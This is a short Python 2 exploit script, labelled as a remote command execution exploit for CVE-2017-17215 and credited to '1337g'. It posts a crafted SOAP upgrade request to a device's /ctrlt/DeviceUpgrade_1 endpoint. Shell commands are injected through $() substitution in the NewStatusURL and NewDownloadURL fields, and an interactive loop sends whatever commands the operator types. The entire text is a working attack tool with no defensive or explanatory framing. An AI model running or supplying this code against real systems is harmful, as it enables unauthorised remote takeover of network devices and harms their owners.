import requests
import sys

url_in = sys.argv[1]
payload_url = url_in + "/ctrlt/DeviceUpgrade_1"
payload_header = {'content-type': 'text/xml'}


def payload_command (command_in):
    html_escape_table = {
        "&": "&amp;",
        '"': "&quot;",
        "'": "&apos;",
        ">": "&gt;",
        "<": "&lt;",
    }
    command_filtered = "<string>"+"".join(html_escape_table.get(c, c) for c in command_in)+"</string>"
    payload_1 = "<?xml version = \"1.0\" ?>" \
                "   <s:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ns1=\"http://appleworld.com/api/schema\">" \
                "       <s:Body>"\
                "           <u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\">"\
                "               <NewStatusURL> $("+command_filtered+" > /tmp/1337g) </NewStatusURL>"\
                "               <NewDownloadURL> $(cat /tmp/1337g) </NewDownloadURL>"\
                "           </u:Upgrade>"\
                "       </s:Body>" \
                "    </s:Envelope>"
    return payload_1

def do_post(command_in):
    result = requests.post(payload_url, payload_command(command_in ),headers = payload_header)
    print result.content




print "***************************************************** \n" \
       "****************   Coded By 1337g  ****************** \n" \
       "*      CVE-2017-17215 Remote Command Execute EXP    * \n" \
       "***************************************************** \n"

while 1:
    command_in = raw_input("Eneter your command here: ")
    if command_in == "exit" : exit(0)
    do_post(command_in)
